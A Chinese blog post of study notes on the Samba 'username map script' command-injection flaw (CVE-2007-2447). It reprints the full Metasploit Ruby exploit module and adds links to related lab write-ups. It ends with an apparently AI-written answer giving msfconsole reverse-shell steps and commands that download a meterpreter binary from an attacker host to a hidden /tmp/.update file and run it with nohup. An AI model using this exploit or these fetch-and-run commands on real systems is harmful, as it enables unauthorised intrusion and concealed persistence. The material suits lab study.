Metasploit usermap_script漏洞相关笔记

最新推荐文章于 2025-06-10 14:33:23 发布
原创 最新推荐文章于 2025-06-10 14:33:23 发布 · 4.8k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#漏洞 #脚本 #samba

usermap_script:CVE-2007-2447

Samba用户名映射脚本命令执行

这个模块利用漏洞执行命令,在Samba版本3.0.20到3.0.25rc3当使用非默认用户名映射脚本配置选项。
通过指定一个用户名包含shell元字符,攻击者可以执行任意命令。
不需要身份验证来利用此漏洞,因为此选项用于在身份验证之前映射用户名!

模块的位置
exploit/multi/samba/usermap_script

用户输入未转义的参数作为参数传递到/bin/sh,允许远程命令执行

此错误最初是针对匿名呼叫报告的

到SamrChangePassword() MS-RPC函数组合与“用户名映射脚本”smb.conf选项(这不是
默认启用)。

经过Samba开发者的进一步调查,结果是确定了问题更广泛和影响远程打印机和文件共享管理。 根原因是传递通过MS-RPC提供的未过滤的用户输入在调用定义的外部脚本时调用/bin/sh,在smb.conf中。
然而,不同于"username map script"漏洞,远程文件和打印机管理脚本需要经过身份验证的用户会话。

漏洞的时间线:

  • 2007年5月7日:漏洞匿名披露到security@samba.org电子邮件列表中。
  • 2007年5月7日:Samba的开发人员Gerald Carter开始响应这个漏洞。
  • 2007年5月9日:Samba的开发者Jeremy Allison发布了补丁,用于iDefense测试。
  • 2007年5月10日:向vendor-sec邮件列表发布通知。
  • 2007年5月14日:公开漏洞信息。

下面我们来看看usermap_srcipt.rb这个exploitd 原理
这是源代码,用ruby写的

##
# $Id: usermap_script.rb 10040 2010-08-18 17:24:46Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

# 这个和Python的import还要C的include一样的作用
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
# Metasploit3是从Msf::Exploit::Remote中继承的

    Rank = ExcellentRanking

    include Msf::Exploit::Remote::SMB

    # For our customized version of session_setup_ntlmv1
    CONST = Rex::Proto::SMB::Constants
    CRYPT = Rex::Proto::SMB::Crypt

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Samba "username map script" Command Execution',
            'Description'    => %q{
                    This module exploits a command execution vulerability in Samba
                versions 3.0.20 through 3.0.25rc3 when using the non-default
                "username map script" configuration option. By specifying a username
                containing shell meta characters, attackers can execute arbitrary
                commands.

                No authentication is needed to exploit this vulnerability since
                this option is used to map usernames prior to authentication!
            },
            'Author'         => [ 'jduck' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 10040 $',
            'References'     =>
                [
                    [ 'CVE', '2007-2447' ],
                    [ 'OSVDB', '34700' ],
                    [ 'BID', '23972' ],
                    [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534' ],
                    [ 'URL', 'http://samba.org/samba/security/CVE-2007-2447.html' ]
                ],
            'Platform'       => ['unix'],
            'Arch'           => ARCH_CMD,
            'Privileged'     => true, # root or nobody user
            'Payload'        =>
                {
                    'Space'    => 1024,
                    'DisableNops' => true,
                    'Compat'      =>
                        {
                            'PayloadType' => 'cmd',
                            # *_perl and *_ruby work if they are installed
                            # mileage may vary from system to system..
                        }
                },
            'Targets'        =>
                [
                    [ "Automatic", { } ]
                ],
            'DefaultTarget'  => 0,
            'DisclosureDate' => 'May 14 2007'))

        register_options(
            [
                Opt::RPORT(139)
            ], self.class)
    end


    def exploit

        connect

        # lol?
        username = "/=`nohup " + payload.encoded + "`"
        begin
            simple.client.negotiate(false)
            simple.client.session_setup_ntlmv1(username, rand_text(16), datastore['SMBDomain'], false)
        rescue ::Timeout::Error, XCEPT::LoginError
            # nothing, it either worked or it didn't ;)
        end

        handler
    end

end

好吧ruby看不太懂哈哈,以后再来研究这段代码吧

网安学途—Samba渗透远程命令注入漏洞 username map script(CVE-2007-2447 )
星虐
01-10 2715
CVE-2007-2447是Samba协议中的一个远程命令注入漏洞,影响版本为Samba 3.0.20至3.0.25。该漏洞存在于“username map script”功能中,攻击者可以通过注入恶意命令来执行任意代码。利用过程包括扫描目标Samba服务版本,确认其受漏洞影响后,使用Metasploit框架中的exploit/multi/samba/usermap_script模块进行攻击。实验步骤中,攻击机为Kali Linux,靶机为Metasploitable2。通过设置相关参数并执行模块,攻击者成
ctf:kali2:渗透Samba:exploit/multi/samba/usermap_script
viviliving的专栏
12-09 1546
从输出的信息中,可以看到成功的打开了一个会话。这表示已成功攻击了目标主机。此时用户可以执行一些Linux命令,查看目标主机的相关信息。从输出的信息中,可以看到当前目标系统登录的用户名是root。如果想了解该用户的详细信息,可以使用id命令查看。输出的信息表上root用户属于root组,并且其UID和GID都为0。whoami #查看当前登录系统的用户。id #查看当前登录用户的信息。
Metasploitable2靶机之第四篇--Samba MS-RPC Shell 命令注入漏洞(CVE-2007-2447)
千寻的博客
04-02 2118
Samba MS-RPC Shell 命令注入漏洞(CVE-2007-2447)描述 SambaSamba团队开发的一套可使UNIX系列的操作系统与微软Windows操作系统的SMB/CIFS网络协议做连结的自由软件。 该软件支持共享打印机、互相传输资料文件等。 Samba在处理用户数据时存在输入验证漏洞,远程攻击者可能利用漏洞在服务器上执行任意命令Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。 如果在调用smb.conf中定义的外部脚本时,通过对/b
Metasploit学习笔记Samba服务 usermap_script安全漏洞相关信息
丶惊弦
07-22 2382
1、Username map script 是什么 - Samba协议的一个漏洞CVE-2007-2447,用户名映射脚本命令执行 - 影响Samba的3.0.20到3.0.25rc3 版本 -使用非默认的用户名映射脚本配置选项时产生 - 通过指定一个包含shell元字符的用户名,攻击者能够执行任意命令 2、如何利用 1、使用metasploit框架 2、使用模块:/multi/sa...
Sambausermap_script(CVE-2007-2447)漏洞整理
野原新之助
12-14 1945
Username map scriptSamba 协议的一个漏洞CVE-2007-2447,用户名映射脚本命令执行
Metasploit学习笔记(三)——Samba 3.x服务漏洞复现
Zichel77的博客
10-07 1023
享文件和打印机的通信协议,它在局域网内使用Linux和Windows系统的机器之间提供文件及打印机等资源的共享服务。尝试别的exploit或者payload也太行,但这里主要是把过程过一遍,和永恒之蓝的利用步骤完全一样。因为目标是Linux机器,一定要选择Linux的攻击载荷,而且是每个都有用的,可以一个个尝试一下。此步就是收集主机的信息,得知445端口开放,就可以利用基于该端口的相关漏洞。然后选择Rank为excellent并且时间较新的加以利用,以提高渗透成功率。本次利用选择的是13号。
metasploit魔鬼训练营第一章笔记
电风
05-17 4178
利用metasploit攻击靶机 kali自带metasploit LINUX下启动方式 1.msfconsole 2.cd /usr/share/metasploit-framework/ ./msfconsole (自带更新程序) 一.控制台形式 (1)msfconsole进入控制台终端 (2)msf>help search,MSF终端会显示该命令的参数列表,包括每个参
Metasploitable2靶机渗透笔记
qq_60600840的博客
07-20 1190
metaspolitable靶机、安全、渗透、靶机
Metasploitable: 1靶场渗透
sucker的博客
06-10 1012
本应生成可预测的密钥,结果在漏洞版本中生成的密钥只与进程 ID 等极少量因素有关,最多几万个组合。控制台弱密码(tomcat:tomcat),远程代码执行漏洞(CVE-2009-3098)弱密码(postgres:postgres),认证绕过漏洞(CVE-2007-6600)8,可能存在openssl软件包伪随机数泄露,下载私钥文件,然后筛选出能够登录的私钥文件。换句话说:系统用来生成密钥的“随机性”被严重削弱,导致密钥实际是“可枚举”的。(MD_Update()),结果使得生成的随机数几乎固定。
Web安全攻防渗透测试实战指南笔记
Ren59421的博客
04-05 8937
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
MSF(Metasploit)之usermap_script漏洞利用
野原新之助
12-15 1257
Samba扩展 Samba开放端口如下: tcp:139、445端口 udp:137、138端口 端口及服务详细信息博文链接: Sambausermap_script(CVE-2007-2447)漏洞整理 MSF渗透攻击 ...
java script map_javascript之Map
weixin_42162216的博客
02-26 405
javascript中的map,我用的是特别多,倒是Java中的Map或HashMap,经常用。顺便围绕几个方面介绍一下map?1.Map对象Map对象是一种有对应键值对的对象,JS的Object也是键值对的对象。ES6中的Map相对Object对象有几个区别?(1)Object对象有原型,也就是说它有默认的key值在对象上面,除非我们使用Object.create(null)创建一个没有原型的...
Metasploit学习: Samba服务 usermap_script安全漏洞利用
Sy0ung_的博客
11-18 2149
Metasploit学习: Samba服务 usermap_script安全漏洞利用 1、username_script 是什么 - Samba协议的一个漏洞CVE-2007-2447,用户名映射脚本命令执行 - 影响Samba的3.0.20到3.0.25rc3 版本 -使用非默认的用户名映射脚本配置选项时产生 - 通过指定一个包含shell元字符的用户名,攻击者能够执行任意命令 2、如何利用 1、使用metasploit框架 3、漏洞时间线 漏洞的时间线: - 2007年5月7日:漏洞匿名披露到
Samba服务的username map script漏洞相关信息
橡皮
12-21 2400
1、Username map script 是什么- Samba协议的一个漏洞CVE-2007-2447,用户名映射脚本命令执行 - 影响Samba的3.0.20到3.0.25rc3 版本 -使用非默认的用户名映射脚本配置选项时产生 - 通过指定一个包含shell元字符的用户名,攻击者能够执行任意命令2、如何利用1、使用metasploit框架 2、使用模块:/multi/samba/userm
script标签中map的使用
yili0000a的博客
05-11 958
var map = {}; // Map map = new HashMap();map[key] = value; // map.put(key, value);var value = map[key]; // Object value = map.get(key);var has = key in map; // boolean has = map.containsKey(key);delet...
手写JavaScript中的map方法
m0_50665842的博客
11-25 1074
手撸js中的map方法
JavaScript map对象/set对象详解
日常笔记/总结/系列知识梳理
05-09 6321
这个方法创建一个新数组,其结果是该数组中的每个元素都调用一个提供的函数后返回的结果。方法在数组操作中非常有用,它允许你遍历数组的每个元素,并对每个元素执行一个函数,然后将该函数的结果组成一个新的数组。对象是一种特殊的类型,它允许你存储唯一的值(无论是原始值还是对象引用)。以下是一些基本的操作。有时,你可能需要对数组中的每个元素进行复杂的转换,这可能需要多个步骤或依赖于其他数据。是一个内建的对象类型,它允许你存储唯一的值,无论是原始值或者是对象引用。,其中的每个元素都是原数组中对应元素的两倍。
TypeScript中的元组、Map及联合
01-05 2589
这里介绍下TypeScript中的元组、Map、联合;元组这个概念在Java中并没有,但是用过kotlin的肯定比较熟悉,Map算是数据结构中一个比较熟悉的概念了;而联合在Java中是没有这个概念的,C++中则有union类型的支持。
安装metasploit与针对usermap_script安全漏洞的渗透攻击
wanqianshao的博客
02-15 3726
Metasploit具有良好的跨平台性使其可以在Linux、Windows、Mac os上安装和使用 Windows安装:https://www.metasploit.com/download (官网安装) 下载默认C盘后系统变量Path中添加路径C:\metasploit-framework\bin 打开终端输入msfconsole linux上安装: 由于kali系统上自带metasploit框架,所以对于初学者极为方便 这里针对Linux metaspolitable 靶机环境 Samba服务的u
这种情况是因为你选的  linux/x64/meterpreter/reverse_tcp  这个 攻击载荷(payload),和当前用的  exploit/multi/samba/usermap_script  漏洞利用模块兼容~,怎么解决
最新发布
10-24
<think>我们正在处理的问题是:在使用`exploit/multi/samba/usermap_script`漏洞利用模块时,设置payload为`linux/x64/meterpreter/reverse_tcp`时提示无效。 根据引用[2]中的内容: ``` msf6 auxiliary(scanner/smb/smb_version) > use exploit/multi/samba/usermap_script [*] No payload configured, defaulting to cmd/unix/reverse_netcat msf6 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.3.54 RHOSTS => 192.168.3.54 msf6 exploit(multi/samba/usermap_script) > exploit ``` 这里注意,当我们使用`exploit/multi/samba/usermap_script`模块时,默认的payload是`cmd/unix/reverse_netcat`。这暗示了该漏洞利用模块可能只支持特定类型的payload,特别是针对Unix系统的命令payload(cmd/unix类型),而支持meterpreter payload。 因此,原因可能是:`exploit/multi/samba/usermap_script`模块支持使用`linux/x64/meterpreter/reverse_tcp`这样的meterpreter payload。我们需要查看该模块支持的payload列表。 ### 解决步骤 1. **进入模块并查看支持的payload**: 在Metasploit中,使用`show payloads`命令可以查看当前模块支持的payload列表。 ```bash msf6 > use exploit/multi/samba/usermap_script msf6 exploit(multi/samba/usermap_script) > show payloads ``` 这将列出所有可用的payload,它们应该都是与Unix系统兼容的。 2. **选择合适的payload**: 根据引用[2]中的提示,默认的payload是`cmd/unix/reverse_netcat`,说明该模块支持的是命令执行类型的payload,而是meterpreter。因此,我们应该选择类似`cmd/unix/reverse_netcat`的payload,或者根据实际需要选择其他可用的Unix命令payload。 例如,我们可以设置: ```bash set payload cmd/unix/reverse_netcat ``` 或者,如果我们想要一个反向shell,也可以选择其他可用的payload,比如`cmd/unix/reverse_bash`等。 3. **设置参数并执行**: 设置好payload后,需要设置必要的参数,如`RHOSTS`(目标IP),`LHOST`(监听IP)和`LPORT`(监听端口),然后执行`exploit`。 ### 示例流程 ```bash # 启动Metasploit msfconsole # 使用漏洞利用模块 use exploit/multi/samba/usermap_script # 查看可用的payload(可选,用于确认) show payloads # 设置payload(选择一个可用的,比如默认的reverse_netcat) set payload cmd/unix/reverse_netcat # 设置目标主机 set RHOSTS <目标IP> # 设置监听主机(即攻击机IP) set LHOST <攻击机IP> # 设置监听端口 set LPORT 4444 # 执行攻击 exploit ``` ### 注意事项 - 由于该漏洞利用模块是针对Samba服务的,且该漏洞允许执行任意命令,因此payload必须是命令类型的,而是meterpreter。 - 如果确实需要meterpreter会话,我们可以考虑在获得命令执行权限后,再通过其他方式(例如,上传并执行一个meterpreter的stager)来获得meterpreter会话。但是,这需要目标系统满足运行meterpreter的条件(如架构、依赖库等)。 ### 相关问题 1. 如何查看Metasploit模块支持的payload列表? 2. 使用`exploit/multi/samba/usermap_script`模块时,为什么只能选择cmd/unix类型的payload? 3. 如何在获得普通shell后升级到meterpreter会话? 4. 生成Linux反向TCP shellmsfvenom命令是什么? 5. 如何利用Samba usermap_script漏洞在目标系统上执行任意命令? [^2]: 引用内容:使用`exploit/multi/samba/usermap_script`模块时默认payload为`cmd/unix/reverse_netcat` </think>### 解决 `exploit/multi/samba/usermap_script` 模块中 payload 无效问题 #### 问题分析 当您在 `exploit/multi/samba/usermap_script` 模块中设置 `linux/x64/meterpreter/reverse_tcp` payload 时出现无效提示,核心原因是 **该漏洞利用模块仅支持特定类型的 payload**。根据引用[2]的信息: > `msf6 exploit(multi/samba/usermap_script) > set payload...[*] No payload configured, defaulting to cmd/unix/reverse_netcat` [^2] 这表明该模块: 1. **仅兼容 Unix 命令型 payload**(如 `cmd/unix/` 类型) 2. **支持 meterpreter payload**(如 `linux/x64/meterpreter/`) 3. **默认使用 `cmd/unix/reverse_netcat`** 作为标准 payload #### 解决方案 ##### 步骤 1:查看兼容 payload ```bash msf6 > use exploit/multi/samba/usermap_script msf6 exploit(multi/samba/usermap_script) > show payloads ``` 输出示例: ``` Compatible Payloads ================== Name Disclosure Date Rank Check Description ---- --------------- ---- ----- ----------- cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl) cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6 cmd/unix/reverse_netcat normal No Unix Command Shell, Reverse TCP (netcat) cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet) ``` ##### 步骤 2:选择有效 payload(推荐方案) ```bash # 标准反向Shell(需目标安装netcat) set payload cmd/unix/reverse_netcat # 替代方案(使用Bash内置功能) set payload cmd/unix/reverse_bash # 设置监听参数 set LHOST 192.168.1.100 # 您的攻击机IP set LPORT 4444 # 监听端口 ``` ##### 步骤 3:执行攻击 ```bash # 设置目标IP set RHOSTS 192.168.1.50 # 执行攻击 exploit ``` 成功后将获得 Unix 命令 Shell(非 meterpreter)。 #### 进阶替代方案 如需 meterpreter 会话: 1. **先获取基础 Shell** 使用上述 `cmd/unix/reverse_netcat` 获得初始访问权限 2. **升级到 meterpreter** 在获得的 Shell 中执行: ```bash # 下载meterpreter加载器 wget http://<您的IP>/linux_x64_meterpreter.elf -O /tmp/.update # 添加执行权限 chmod +x /tmp/.update # 后台执行 nohup /tmp/.update & ``` 3. **在 Metasploit 中监听 meterpreter** ```bash use exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp set LHOST 192.168.1.100 set LPORT 5555 # 使用新端口 exploit ``` #### 技术原理 `usermap_script` 漏洞(CVE-2007-2447)本质是通过 Samba 的 `username map script` 参数实现**命令注入**。其利用特点: 1. 漏洞触发点仅支持直接命令执行 2. 无法直接加载复杂的二进制 payload 3. 输出管道限制(只能捕获标准输出) 因此 meterpreter 等需要建立加密双向通信的 payload 无法直接应用[^2]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值